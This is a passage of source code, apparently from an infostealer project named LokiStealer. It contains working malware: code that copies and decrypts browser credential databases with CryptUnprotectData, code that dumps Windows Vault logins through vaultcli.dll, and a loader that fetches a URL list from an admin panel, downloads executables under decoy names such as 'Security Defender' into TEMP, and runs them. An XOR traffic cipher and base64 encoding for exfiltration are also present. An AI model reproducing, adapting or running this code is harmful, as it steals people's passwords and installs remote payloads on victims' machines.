0x4669BE79U, 0xCB61B38CU, 0xBC66831AU, 0x256FD2A0U, 0x5268E236U, 49 | 0xCC0C7795U, 0xBB0B4703U, 0x220216B9U, 0x5505262FU, 0xC5BA3BBEU, 50 | 0xB2BD0B28U, 0x2BB45A92U, 0x5CB36A04U, 0xC2D7FFA7U, 0xB5D0CF31U, 51 | 0x2CD99E8BU, 0x5BDEAE1DU, 0x9B64C2B0U, 0xEC63F226U, 0x756AA39CU, 52 | 0x026D930AU, 0x9C0906A9U, 0xEB0E363FU, 0x72076785U, 0x05005713U, 53 | 0x95BF4A82U, 0xE2B87A14U, 0x7BB12BAEU, 0x0CB61B38U, 0x92D28E9BU, 54 | 0xE5D5BE0DU, 0x7CDCEFB7U, 0x0BDBDF21U, 0x86D3D2D4U, 0xF1D4E242U, 55 | 0x68DDB3F8U, 0x1FDA836EU, 0x81BE16CDU, 0xF6B9265BU, 0x6FB077E1U, 56 | 0x18B74777U, 0x88085AE6U, 0xFF0F6A70U, 0x66063BCAU, 0x11010B5CU, 57 | 0x8F659EFFU, 0xF862AE69U, 0x616BFFD3U, 0x166CCF45U, 0xA00AE278U, 58 | 0xD70DD2EEU, 0x4E048354U, 0x3903B3C2U, 0xA7672661U, 0xD06016F7U, 59 | 0x4969474DU, 0x3E6E77DBU, 0xAED16A4AU, 0xD9D65ADCU, 0x40DF0B66U, 60 | 0x37D83BF0U, 0xA9BCAE53U, 0xDEBB9EC5U, 0x47B2CF7FU, 0x30B5FFE9U, 61 | 0xBDBDF21CU, 0xCABAC28AU, 0x53B39330U, 0x24B4A3A6U, 0xBAD03605U, 62 | 0xCDD70693U, 0x54DE5729U, 0x23D967BFU, 0xB3667A2EU, 
0xC4614AB8U, 63 | 0x5D681B02U, 0x2A6F2B94U, 0xB40BBE37U, 0xC30C8EA1U, 0x5A05DF1BU, 64 | 0x2D02EF8DU 65 | }; 66 | 67 | constexpr uint32_t compute(const wchar_t* data, uint32_t len, uint32_t crc = 0) 68 | { 69 | crc = crc ^ 0xFFFFFFFFU; 70 | for (uint32_t i = 0; i < len; i++) 71 | { 72 | crc = table[*data ^ (crc & 0xFF)] ^ (crc >> 8); 73 | data++; 74 | } 75 | crc = crc ^ 0xFFFFFFFFU; 76 | return crc; 77 | } 78 | } 79 | 80 | uint32_t crc(const wchar_t* data, uint32_t len); 81 | #define CRC32_STR(A) \ 82 | std::integral_constant::value -------------------------------------------------------------------------------- /Source/LokiStealer/Export.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "sqlite3.h" 5 | #include "export.h" 6 | #include "vector.h" 7 | #include "fncs.h" 8 | #include "mem.h" 9 | 10 | #pragma comment(lib, "crypt32.lib") 11 | 12 | char *UnProtect(BYTE* pass, SIZE_T srclen, SIZE_T* out_len) { 13 | DATA_BLOB in; 14 | DATA_BLOB out; 15 | 16 | if (pass == NULL || srclen < 1) { 17 | CHAR* m = (CHAR*)_alloc(2); 18 | lstrcpyA(m, " "); 19 | return m; 20 | } 21 | 22 | in.pbData = (BYTE*)_alloc(srclen); 23 | in.cbData = srclen; 24 | _copy(in.pbData, pass, srclen); 25 | 26 | if (CryptUnprotectData(&in, 0, 0, 0, 0, 0, &out)) { 27 | char *decrypted_mem = (char *)_alloc(out.cbData + 1); 28 | char *decrypted = (char *)out.pbData; 29 | 30 | _copy(decrypted_mem, decrypted, out.cbData); 31 | 32 | _free(in.pbData); 33 | LocalFree(out.pbData); 34 | 35 | out_len[0] = out.cbData; 36 | return decrypted_mem; 37 | } 38 | else { 39 | _free(in.pbData); 40 | return NULL; 41 | } 42 | } 43 | 44 | BOOL checkEncrypted(int e[], int s, int in) { 45 | for (int i = 0; i < s; i++) { 46 | if ((e[i] - 1) == in) return 1; 47 | } 48 | return 0; 49 | } 50 | 51 | LPCWSTR moveRandom(LPCWSTR path) { 52 | DWORD dwAttrib = GetFileAttributesW(path); 53 | 54 | BOOL exists = (dwAttrib != INVALID_FILE_ATTRIBUTES && 55 
| !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); 56 | 57 | if (exists) { 58 | WCHAR* newPath = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 59 | SIZE_T ticks = GetTickCount(); 60 | wnsprintfW(newPath, 260, L"%s%u", path, ticks); 61 | if (!CopyFileW(path, newPath, FALSE)) return 0; 62 | 63 | return newPath; 64 | } 65 | else return 0; 66 | } 67 | 68 | char* makeString(BYTE* data, CHAR* append, SIZE_T append_len, SIZE_T len) { 69 | BYTE* mem = (BYTE*)_alloc(append_len + len + 4); 70 | if (append) lstrcpyA((char*)mem, append); 71 | if (data) data != 0 ? lstrcatA((char*)mem, (char*)data) : lstrcpyA((char*)mem, (char*)data); 72 | 73 | return (char*)mem; 74 | } 75 | 76 | void _sqliteProcessFunc(vector* v, SIZE_T* count_value, LPCWSTR dbPath, LPCSTR query, LPCSTR endstr, int addrn, int count, int encrypted_columns[], char* columns_prefix[], int encrypted_columns_count) { 77 | LPCWSTR db_path = moveRandom(dbPath); 78 | 79 | if (db_path != 0 && dbPath != 0) { 80 | sqlite3_stmt *stmt; 81 | sqlite3 *db; 82 | 83 | if (sqlite3_open16(db_path, &db) == SQLITE_OK) { 84 | if (sqlite3_prepare_v2(db, query, -1, &stmt, 0) == SQLITE_OK) { 85 | while (sqlite3_step(stmt) == SQLITE_ROW) { 86 | SIZE_T size = 0; 87 | for (int i = 0; i < count; i++) { 88 | if (checkEncrypted(encrypted_columns, encrypted_columns_count, i)) { 89 | BYTE *bytes = (BYTE *)sqlite3_column_blob(stmt, i); 90 | SIZE_T bytes_len = sqlite3_column_bytes(stmt, i); 91 | CHAR* decrypted = UnProtect(bytes, bytes_len, &size); 92 | 93 | CHAR* out_str = makeString((BYTE*)decrypted, columns_prefix[i], size, lstrlenA(columns_prefix[i])); 94 | _free(decrypted); 95 | vector_add(v, out_str); 96 | 97 | if(addrn) vector_add(v, makeString((BYTE*)"\r\n", (char*)"", 0, 2)); 98 | *count_value += 1; 99 | } 100 | else { 101 | BYTE *bytes = (BYTE *)sqlite3_column_blob(stmt, i); 102 | SIZE_T bytes_len = sqlite3_column_bytes(stmt, i); 103 | CHAR* v_val = makeString(bytes, columns_prefix[i], lstrlenA(columns_prefix[i]), bytes_len); 104 | 105 | 
vector_add(v, v_val); 106 | if (addrn) vector_add(v, makeString((BYTE*)"\r\n", (char*)"", 0, 2)); 107 | *count_value += 1; 108 | } 109 | } 110 | vector_add(v, makeString((BYTE*)endstr, (char*)"", 0, lstrlenA(endstr))); 111 | } 112 | } 113 | sqlite3_finalize(stmt); 114 | sqlite3_close(db); 115 | } 116 | } 117 | if (db_path) DeleteFileW(db_path); 118 | if (db_path) _free((void*)db_path); 119 | } 120 | 121 | vector sqliteProcessFunction(LPCWSTR dbPath, SIZE_T* count_value, LPCSTR query, LPCSTR endstr, int addrn, int count, int encrypted_columns[], char* columns_prefix[], int encrypted_columns_count) { 122 | vector v; 123 | vector_init(&v); 124 | _sqliteProcessFunc(&v, count_value, dbPath, query, endstr, addrn, count, encrypted_columns, columns_prefix, encrypted_columns_count); 125 | return v; 126 | } 127 | 128 | void vec_get_str(vector v, CHAR** c, SIZE_T* s, SIZE_T prefix_len) { 129 | SIZE_T d_size = 0; 130 | SIZE_T now_copy = 0; 131 | 132 | SIZE_T v_size = vector_count(&v); 133 | 134 | for (SIZE_T i = 0; i < v_size; i++) { 135 | d_size += lstrlenA((CHAR*)vector_get(&v, i)); 136 | } 137 | 138 | SIZE_T out_size = ((v_size * (prefix_len + 3)) + d_size) + 1; 139 | CHAR * out_mem = (CHAR*)_alloc(out_size); 140 | 141 | for (SIZE_T i = 0; i < v_size; i++) { 142 | CHAR* c = (CHAR*)vector_get(&v, i); 143 | wnsprintfA(out_mem + now_copy, out_size - now_copy, "%s", c); 144 | //_copy((out_mem + now_copy), c, lstrlenA(c)); 145 | now_copy += lstrlenA(c); 146 | _free(c); 147 | } 148 | 149 | c[0] = out_mem; 150 | s[0] = lstrlenA(out_mem); 151 | } -------------------------------------------------------------------------------- /Source/LokiStealer/Ldr.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "parson.h" 8 | #include "fncs.h" 9 | #include "mem.h" 10 | #include "ldr.h" 11 | 12 | char* _itoa(int i, char b[]) { 13 | char const digit[] = "0123456789"; 14 | 
char* p = b; 15 | if (i < 0) { 16 | *p++ = '-'; 17 | i *= -1; 18 | } 19 | int shifter = i; 20 | do { 21 | ++p; 22 | shifter = shifter / 10; 23 | } while (shifter); 24 | *p = '\0'; 25 | do { 26 | *--p = digit[i % 10]; 27 | i = i / 10; 28 | } while (i); 29 | return b; 30 | } 31 | 32 | void downloadFile(LPCWSTR path, LPCSTR link) { 33 | DWORD dwBytesRead = 1; 34 | 35 | if (HINTERNET hInternetSession = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0)) { 36 | if (HINTERNET hURL = InternetOpenUrlA(hInternetSession, link, 0, 0, 0, 0)) { 37 | if (char* buf = (char*)_alloc(1024)) { 38 | DWORD dwTemp; 39 | HANDLE hFile = CreateFileW(path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 40 | 41 | if (INVALID_HANDLE_VALUE == hFile) { 42 | return; 43 | } 44 | 45 | while (dwBytesRead > 0) 46 | { 47 | InternetReadFile(hURL, buf, (DWORD)1024, &dwBytesRead); 48 | WriteFile(hFile, buf, dwBytesRead, &dwTemp, NULL); 49 | } 50 | 51 | _free(buf); 52 | 53 | InternetCloseHandle(hURL); 54 | InternetCloseHandle(hInternetSession); 55 | 56 | CloseHandle(hFile); 57 | } 58 | } 59 | } 60 | } 61 | 62 | int crand() { 63 | BYTE pbData[1]; 64 | HCRYPTPROV hCryptProv; 65 | if (CryptAcquireContextW(&hCryptProv, NULL, L"Microsoft Base Cryptographic Provider v1.0", PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) { 66 | if (CryptAcquireContextW(&hCryptProv, NULL, L"Microsoft Base Cryptographic Provider v1.0", PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) 67 | { 68 | if (CryptGenRandom(hCryptProv, 1, pbData)) 69 | { 70 | CryptReleaseContext(hCryptProv, 0); 71 | return pbData[0]; 72 | } 73 | } 74 | } 75 | 76 | return 0; 77 | } 78 | 79 | LPCWSTR getName() { 80 | WCHAR charlist[] = { 81 | L'A', L'B', L'C', L'D', L'E', L'F', 82 | L'G', L'H', L'I', L'J', L'K', L'L', 83 | L'M', L'N', L'O', L'P', L'Q', L'R', 84 | L'S', L'T', L'U', L'V', L'W', L'X', 85 | L'Y', L'Z', L'0', L'1', L'2', 
L'3', 86 | L'4', L'5', L'6', L'7', L'8', L'9' 87 | }; 88 | 89 | LPCWSTR list[] = { 90 | L"System", L"Process", L"Update", L"Memory", L"Browser", 91 | L"Security", L"Defender", L"Monitor", L"Protector", L"Optimization", 92 | L"Finder", L"Zip" 93 | }; 94 | 95 | int a = crand() % (_countof(list) - 1); 96 | int b = crand() % (_countof(list) - 1); 97 | while (a == b) b = crand() % (_countof(list) - 1); 98 | 99 | int alcsize = (lstrlenW(list[a]) + lstrlenW(list[b]) + 14) * sizeof(WCHAR); 100 | 101 | LPCWSTR buf = (WCHAR*)_alloc(alcsize); 102 | WCHAR c1 = charlist[crand() % 35]; 103 | WCHAR c2 = charlist[crand() % 35]; 104 | WCHAR c3 = charlist[crand() % 35]; 105 | WCHAR c4 = charlist[crand() % 35]; 106 | WCHAR c5 = charlist[crand() % 35]; 107 | WCHAR c6 = charlist[crand() % 35]; 108 | WCHAR c7 = charlist[crand() % 35]; 109 | WCHAR c8 = charlist[crand() % 35]; 110 | WCHAR c9 = charlist[crand() % 35]; 111 | 112 | wnsprintfW((WCHAR*)buf, alcsize, L"%s %s {%c%c%c%c%c%c%c%c%c}", list[a], list[b], c1, c2, c3, c4, c5, c6, c7, c8, c9); 113 | return buf; 114 | } 115 | 116 | LPCWSTR generateFilePath() { 117 | LPWSTR Temp = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 118 | LPWSTR ExecuteFilePath = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 119 | LPCWSTR fileName = getName(); 120 | 121 | GetEnvironmentVariableW(L"TEMP", Temp, MAX_PATH * sizeof(WCHAR)); 122 | wnsprintfW(ExecuteFilePath, MAX_PATH, L"%s\\%s.exe", Temp, fileName); 123 | 124 | _free(Temp); 125 | _free((WCHAR*)fileName); 126 | return ExecuteFilePath; 127 | } 128 | 129 | void runLdr() { 130 | CHAR* szBuffer = (CHAR*)_alloc(2048); 131 | 132 | if (HINTERNET hIntSession = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0)) { 133 | if (HINTERNET hHttpSession = InternetConnectW(hIntSession, ADMIN_PANEL, 80, 0, 0, INTERNET_SERVICE_HTTP, 0, NULL)) { 134 | if (HINTERNET hHttpRequest = 
HttpOpenRequestA(hHttpSession, "GET", LDR_URL, 0, 0, 0, INTERNET_FLAG_RELOAD, 0)) { 135 | if (HttpSendRequestA(hHttpRequest, "Content-Type: application/x-www-form-urlencoded", 24, NULL, NULL)) { 136 | 137 | DWORD dwRead = 0; 138 | while (InternetReadFile(hHttpRequest, szBuffer, 2048, &dwRead) && dwRead) { 139 | szBuffer[dwRead] = 0; 140 | dwRead = 0; 141 | } 142 | 143 | InternetCloseHandle(hHttpRequest); 144 | InternetCloseHandle(hHttpSession); 145 | InternetCloseHandle(hIntSession); 146 | } 147 | } 148 | } 149 | } 150 | 151 | JSON_Value *root_value = json_parse_string(szBuffer); 152 | 153 | char* integer = (char*)_alloc(MAX_PATH); 154 | JSON_Object *root_object = json_value_get_object(root_value); 155 | for (size_t i = 0; i < json_object_get_count(root_object); i++) { 156 | wnsprintfA(integer, MAX_PATH, "%u", i); 157 | const char* str = json_object_get_string(root_object, integer); 158 | 159 | LPCWSTR fp = generateFilePath(); 160 | if (fp) { 161 | wprintf(fp); 162 | downloadFile(fp, str); 163 | ShellExecuteW(0, L"open", fp, 0, 0, SW_SHOW); 164 | } 165 | _free((void*)fp); 166 | } 167 | _free(integer); 168 | _free(szBuffer); 169 | json_value_free(root_value); 170 | } -------------------------------------------------------------------------------- /Source/LokiStealer/Cred.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "vector.h" 5 | #include "mem.h" 6 | #include "Cred.h" 7 | 8 | namespace cred { 9 | extern bool initialized; 10 | extern HMODULE hvaultLib; 11 | BOOL init(void); 12 | void finalize(void); 13 | void savepass(vector* v, SIZE_T* count); 14 | } 15 | 16 | bool cred::initialized = false; 17 | HMODULE cred::hvaultLib = NULL; 18 | 19 | typedef HANDLE HVAULT; 20 | #define VAULT_ENUMERATE_ALL_ITEMS 512 21 | 22 | enum VAULT_SCHEMA_ELEMENT_ID { 23 | ElementId_Illegal = 0, 24 | ElementId_Resource = 1, 25 | ElementId_Identity = 2, 26 | ElementId_Authenticator = 3, 27 | 
ElementId_Tag = 4, 28 | ElementId_PackageSid = 5, 29 | ElementId_AppStart = 0x64, 30 | ElementId_AppEnd = 0x2710 31 | }; 32 | 33 | enum VAULT_ELEMENT_TYPE { 34 | ElementType_Boolean = 0, 35 | ElementType_Short = 1, 36 | ElementType_UnsignedShort = 2, 37 | ElementType_Integer = 3, 38 | ElementType_UnsignedInteger = 4, 39 | ElementType_Double = 5, 40 | ElementType_Guid = 6, 41 | ElementType_String = 7, 42 | ElementType_ByteArray = 8, 43 | ElementType_TimeStamp = 9, 44 | ElementType_ProtectedArray = 0xA, 45 | ElementType_Attribute = 0xB, 46 | ElementType_Sid = 0xC, 47 | ElementType_Last = 0xD, 48 | ElementType_Undefined = 0xFFFFFFFF 49 | }; 50 | 51 | typedef struct _VAULT_BYTE_BUFFER { 52 | DWORD Length; 53 | PBYTE Value; 54 | } VAULT_BYTE_BUFFER, *PVAULT_BYTE_BUFFER; 55 | 56 | typedef struct _VAULT_ITEM_DATA { 57 | DWORD SchemaElementId; 58 | DWORD unk0; 59 | VAULT_ELEMENT_TYPE Type; 60 | DWORD unk1; 61 | union { 62 | BOOL Boolean; 63 | SHORT Short; 64 | WORD UnsignedShort; 65 | LONG Int; 66 | ULONG UnsignedInt; 67 | DOUBLE Double; 68 | GUID Guid; 69 | LPWSTR String; 70 | VAULT_BYTE_BUFFER ByteArray; 71 | VAULT_BYTE_BUFFER ProtectedArray; 72 | DWORD Attribute; 73 | DWORD Sid; 74 | } data; 75 | } VAULT_ITEM_DATA, *PVAULT_ITEM_DATA; 76 | 77 | typedef struct _VAULT_ITEM_8 { 78 | GUID SchemaId; 79 | PWSTR FriendlyName; 80 | PVAULT_ITEM_DATA Resource; 81 | PVAULT_ITEM_DATA Identity; 82 | PVAULT_ITEM_DATA Authenticator; 83 | PVAULT_ITEM_DATA PackageSid; 84 | FILETIME LastWritten; 85 | DWORD Flags; 86 | DWORD cbProperties; 87 | PVAULT_ITEM_DATA Properties; 88 | } VAULT_ITEM, *PVAULT_ITEM; 89 | 90 | typedef DWORD(WINAPI *VaultEnumerateVaults)(DWORD flags, PDWORD count, GUID **guids); 91 | typedef DWORD(WINAPI *VaultEnumerateItems)(HVAULT handle, DWORD flags, PDWORD count, PVOID *items); 92 | typedef DWORD(WINAPI *VaultOpenVault)(GUID *id, DWORD flags, HVAULT *handle); 93 | typedef DWORD(WINAPI *VaultCloseVault)(HVAULT handle); 94 | typedef DWORD(WINAPI *VaultFree)(PVOID 
mem); 95 | typedef DWORD(WINAPI * PVAULTGETITEM) (HANDLE vault, LPGUID SchemaId, PVAULT_ITEM_DATA Resource, PVAULT_ITEM_DATA Identity, PVAULT_ITEM_DATA PackageSid, HWND hWnd, DWORD Flags, PVAULT_ITEM * pItem); 96 | 97 | VaultEnumerateItems pVaultEnumerateItems; 98 | VaultFree pVaultFree; 99 | VaultOpenVault pVaultOpenVault; 100 | VaultCloseVault pVaultCloseVault; 101 | VaultEnumerateVaults pVaultEnumerateVaults; 102 | PVAULTGETITEM pVaultGetItem; 103 | 104 | BOOL cred::init(void) { 105 | if (initialized) return TRUE; 106 | 107 | if (!(hvaultLib = LoadLibraryW(L"vaultcli.dll"))) { 108 | return FALSE; 109 | } 110 | 111 | pVaultEnumerateItems = (VaultEnumerateItems)GetProcAddress(hvaultLib, "VaultEnumerateItems"); 112 | pVaultEnumerateVaults = (VaultEnumerateVaults)GetProcAddress(hvaultLib, "VaultEnumerateVaults"); 113 | pVaultFree = (VaultFree)GetProcAddress(hvaultLib, "VaultFree"); 114 | pVaultOpenVault = (VaultOpenVault)GetProcAddress(hvaultLib, "VaultOpenVault"); 115 | pVaultCloseVault = (VaultCloseVault)GetProcAddress(hvaultLib, "VaultCloseVault"); 116 | pVaultGetItem = (PVAULTGETITEM)GetProcAddress(hvaultLib, "VaultGetItem"); 117 | 118 | if (!pVaultEnumerateItems || !pVaultEnumerateVaults || !pVaultFree || !pVaultOpenVault || !pVaultCloseVault || !pVaultGetItem) { 119 | FreeLibrary(hvaultLib); 120 | return FALSE; 121 | } 122 | 123 | initialized = true; 124 | return TRUE; 125 | } 126 | 127 | void cred::finalize(void) { 128 | if (!initialized) return; 129 | 130 | if (hvaultLib) { 131 | FreeLibrary(hvaultLib); 132 | } 133 | 134 | initialized = false; 135 | } 136 | 137 | void cred::savepass(vector* v, SIZE_T* count) { 138 | if (!initialized) return; 139 | 140 | DWORD vaultsCounter, itemsCounter; 141 | LPGUID vaults; 142 | HVAULT hVault; 143 | PVOID items; 144 | PVAULT_ITEM vaultItems, pVaultItems; 145 | 146 | if (pVaultEnumerateVaults(NULL, &vaultsCounter, &vaults) != ERROR_SUCCESS) { 147 | return; 148 | } 149 | 150 | for (DWORD i = 0; i < vaultsCounter; i++) { 151 
| 152 | if (pVaultOpenVault(&vaults[i], 0, &hVault) == ERROR_SUCCESS) { 153 | 154 | if (pVaultEnumerateItems(hVault, VAULT_ENUMERATE_ALL_ITEMS, &itemsCounter, &items) == ERROR_SUCCESS) { 155 | 156 | vaultItems = (PVAULT_ITEM)items; 157 | 158 | for (DWORD j = 0; j < itemsCounter; j++) { 159 | CHAR* url = (CHAR*)_alloc(MAX_PATH); 160 | wnsprintfA(url, MAX_PATH, "Url: %ws\r\n", vaultItems[j].Resource->data.String); 161 | vector_add(v, url); 162 | 163 | CHAR* user = (CHAR*)_alloc(MAX_PATH); 164 | wnsprintfA(user, MAX_PATH, "Username: %ws\r\n", vaultItems[j].Identity->data.String); 165 | vector_add(v, user); 166 | 167 | pVaultItems = NULL; 168 | 169 | if (pVaultGetItem(hVault, &vaultItems[j].SchemaId, vaultItems[j].Resource, vaultItems[j].Identity, vaultItems[j].PackageSid, NULL, 0, &pVaultItems) == 0) { 170 | if (pVaultItems->Authenticator != NULL && pVaultItems->Authenticator->data.String != NULL) { 171 | CHAR* pass = (CHAR*)_alloc(MAX_PATH); 172 | wnsprintfA(pass, MAX_PATH, "Username: %ws\r\n", pVaultItems->Authenticator->data.String); 173 | vector_add(v, pass); 174 | } 175 | 176 | pVaultFree(pVaultItems); 177 | } 178 | CHAR* lastsm = (CHAR*)_alloc(MAX_PATH); 179 | wnsprintfA(lastsm, MAX_PATH, "\r\n"); 180 | vector_add(v, lastsm); 181 | *count += 1; 182 | } 183 | 184 | pVaultFree(items); 185 | } 186 | pVaultCloseVault(&hVault); 187 | } 188 | } 189 | 190 | if (vaults) 191 | { 192 | pVaultFree(vaults); 193 | vaults = NULL; 194 | } 195 | } 196 | 197 | void enumCredentials(vector* v, SIZE_T* count) { 198 | if(cred::init() == TRUE) cred::savepass(v, count); 199 | } -------------------------------------------------------------------------------- /Source/LokiStealer/crypt.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "crypt.h" 5 | #include "mem.h" 6 | #include 7 | #include 8 | #include 9 | 10 | #pragma comment(lib, "Iphlpapi.lib") 11 | 12 | static const uint32_t table[256] = 13 | { 
14 | 0x00000000U, 0x77073096U, 0xEE0E612CU, 0x990951BAU, 0x076DC419U, 15 | 0x706AF48FU, 0xE963A535U, 0x9E6495A3U, 0x0EDB8832U, 0x79DCB8A4U, 16 | 0xE0D5E91EU, 0x97D2D988U, 0x09B64C2BU, 0x7EB17CBDU, 0xE7B82D07U, 17 | 0x90BF1D91U, 0x1DB71064U, 0x6AB020F2U, 0xF3B97148U, 0x84BE41DEU, 18 | 0x1ADAD47DU, 0x6DDDE4EBU, 0xF4D4B551U, 0x83D385C7U, 0x136C9856U, 19 | 0x646BA8C0U, 0xFD62F97AU, 0x8A65C9ECU, 0x14015C4FU, 0x63066CD9U, 20 | 0xFA0F3D63U, 0x8D080DF5U, 0x3B6E20C8U, 0x4C69105EU, 0xD56041E4U, 21 | 0xA2677172U, 0x3C03E4D1U, 0x4B04D447U, 0xD20D85FDU, 0xA50AB56BU, 22 | 0x35B5A8FAU, 0x42B2986CU, 0xDBBBC9D6U, 0xACBCF940U, 0x32D86CE3U, 23 | 0x45DF5C75U, 0xDCD60DCFU, 0xABD13D59U, 0x26D930ACU, 0x51DE003AU, 24 | 0xC8D75180U, 0xBFD06116U, 0x21B4F4B5U, 0x56B3C423U, 0xCFBA9599U, 25 | 0xB8BDA50FU, 0x2802B89EU, 0x5F058808U, 0xC60CD9B2U, 0xB10BE924U, 26 | 0x2F6F7C87U, 0x58684C11U, 0xC1611DABU, 0xB6662D3DU, 0x76DC4190U, 27 | 0x01DB7106U, 0x98D220BCU, 0xEFD5102AU, 0x71B18589U, 0x06B6B51FU, 28 | 0x9FBFE4A5U, 0xE8B8D433U, 0x7807C9A2U, 0x0F00F934U, 0x9609A88EU, 29 | 0xE10E9818U, 0x7F6A0DBBU, 0x086D3D2DU, 0x91646C97U, 0xE6635C01U, 30 | 0x6B6B51F4U, 0x1C6C6162U, 0x856530D8U, 0xF262004EU, 0x6C0695EDU, 31 | 0x1B01A57BU, 0x8208F4C1U, 0xF50FC457U, 0x65B0D9C6U, 0x12B7E950U, 32 | 0x8BBEB8EAU, 0xFCB9887CU, 0x62DD1DDFU, 0x15DA2D49U, 0x8CD37CF3U, 33 | 0xFBD44C65U, 0x4DB26158U, 0x3AB551CEU, 0xA3BC0074U, 0xD4BB30E2U, 34 | 0x4ADFA541U, 0x3DD895D7U, 0xA4D1C46DU, 0xD3D6F4FBU, 0x4369E96AU, 35 | 0x346ED9FCU, 0xAD678846U, 0xDA60B8D0U, 0x44042D73U, 0x33031DE5U, 36 | 0xAA0A4C5FU, 0xDD0D7CC9U, 0x5005713CU, 0x270241AAU, 0xBE0B1010U, 37 | 0xC90C2086U, 0x5768B525U, 0x206F85B3U, 0xB966D409U, 0xCE61E49FU, 38 | 0x5EDEF90EU, 0x29D9C998U, 0xB0D09822U, 0xC7D7A8B4U, 0x59B33D17U, 39 | 0x2EB40D81U, 0xB7BD5C3BU, 0xC0BA6CADU, 0xEDB88320U, 0x9ABFB3B6U, 40 | 0x03B6E20CU, 0x74B1D29AU, 0xEAD54739U, 0x9DD277AFU, 0x04DB2615U, 41 | 0x73DC1683U, 0xE3630B12U, 0x94643B84U, 0x0D6D6A3EU, 0x7A6A5AA8U, 42 | 0xE40ECF0BU, 0x9309FF9DU, 
0x0A00AE27U, 0x7D079EB1U, 0xF00F9344U, 43 | 0x8708A3D2U, 0x1E01F268U, 0x6906C2FEU, 0xF762575DU, 0x806567CBU, 44 | 0x196C3671U, 0x6E6B06E7U, 0xFED41B76U, 0x89D32BE0U, 0x10DA7A5AU, 45 | 0x67DD4ACCU, 0xF9B9DF6FU, 0x8EBEEFF9U, 0x17B7BE43U, 0x60B08ED5U, 46 | 0xD6D6A3E8U, 0xA1D1937EU, 0x38D8C2C4U, 0x4FDFF252U, 0xD1BB67F1U, 47 | 0xA6BC5767U, 0x3FB506DDU, 0x48B2364BU, 0xD80D2BDAU, 0xAF0A1B4CU, 48 | 0x36034AF6U, 0x41047A60U, 0xDF60EFC3U, 0xA867DF55U, 0x316E8EEFU, 49 | 0x4669BE79U, 0xCB61B38CU, 0xBC66831AU, 0x256FD2A0U, 0x5268E236U, 50 | 0xCC0C7795U, 0xBB0B4703U, 0x220216B9U, 0x5505262FU, 0xC5BA3BBEU, 51 | 0xB2BD0B28U, 0x2BB45A92U, 0x5CB36A04U, 0xC2D7FFA7U, 0xB5D0CF31U, 52 | 0x2CD99E8BU, 0x5BDEAE1DU, 0x9B64C2B0U, 0xEC63F226U, 0x756AA39CU, 53 | 0x026D930AU, 0x9C0906A9U, 0xEB0E363FU, 0x72076785U, 0x05005713U, 54 | 0x95BF4A82U, 0xE2B87A14U, 0x7BB12BAEU, 0x0CB61B38U, 0x92D28E9BU, 55 | 0xE5D5BE0DU, 0x7CDCEFB7U, 0x0BDBDF21U, 0x86D3D2D4U, 0xF1D4E242U, 56 | 0x68DDB3F8U, 0x1FDA836EU, 0x81BE16CDU, 0xF6B9265BU, 0x6FB077E1U, 57 | 0x18B74777U, 0x88085AE6U, 0xFF0F6A70U, 0x66063BCAU, 0x11010B5CU, 58 | 0x8F659EFFU, 0xF862AE69U, 0x616BFFD3U, 0x166CCF45U, 0xA00AE278U, 59 | 0xD70DD2EEU, 0x4E048354U, 0x3903B3C2U, 0xA7672661U, 0xD06016F7U, 60 | 0x4969474DU, 0x3E6E77DBU, 0xAED16A4AU, 0xD9D65ADCU, 0x40DF0B66U, 61 | 0x37D83BF0U, 0xA9BCAE53U, 0xDEBB9EC5U, 0x47B2CF7FU, 0x30B5FFE9U, 62 | 0xBDBDF21CU, 0xCABAC28AU, 0x53B39330U, 0x24B4A3A6U, 0xBAD03605U, 63 | 0xCDD70693U, 0x54DE5729U, 0x23D967BFU, 0xB3667A2EU, 0xC4614AB8U, 64 | 0x5D681B02U, 0x2A6F2B94U, 0xB40BBE37U, 0xC30C8EA1U, 0x5A05DF1BU, 65 | 0x2D02EF8DU 66 | }; 67 | 68 | uint32_t crc(const wchar_t* data, uint32_t len) 69 | { 70 | uint32_t crc = 0; 71 | crc = crc ^ 0xFFFFFFFFU; 72 | for (uint32_t i = 0; i < len; i++) 73 | { 74 | crc = table[*data ^ (crc & 0xFF)] ^ (crc >> 8); 75 | data++; 76 | } 77 | crc = crc ^ 0xFFFFFFFFU; 78 | return crc; 79 | } 80 | 81 | void TRAFFIC_ENCRYPT(unsigned char S[256], unsigned char* data, int data_len) { 82 | for (int 
i = 0; i < data_len; i++) { 83 | data[i] = data[i] ^ S[i % 256]; 84 | } 85 | } 86 | 87 | LPSTR base64Encode(LPBYTE source, SIZE_T sourceSize, SIZE_T *destSize) 88 | { 89 | static const char cb64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_";//-_ = +/ 90 | LPBYTE dest = (LPBYTE)_alloc((sourceSize + 2) / 3 * 4 + 1); 91 | if (dest) 92 | { 93 | LPBYTE p = dest; 94 | BYTE cur[3]; 95 | 96 | while (sourceSize > 0) 97 | { 98 | DWORD len = 0; 99 | for (DWORD i = 0; i < 3; i++) 100 | { 101 | if (sourceSize > 0) 102 | { 103 | sourceSize--; 104 | len++; 105 | cur[i] = source[i]; 106 | } 107 | else cur[i] = 0; 108 | } 109 | 110 | source += 3; 111 | 112 | p[0] = cb64[cur[0] >> 2]; 113 | p[1] = cb64[((cur[0] & 0x03) << 4) 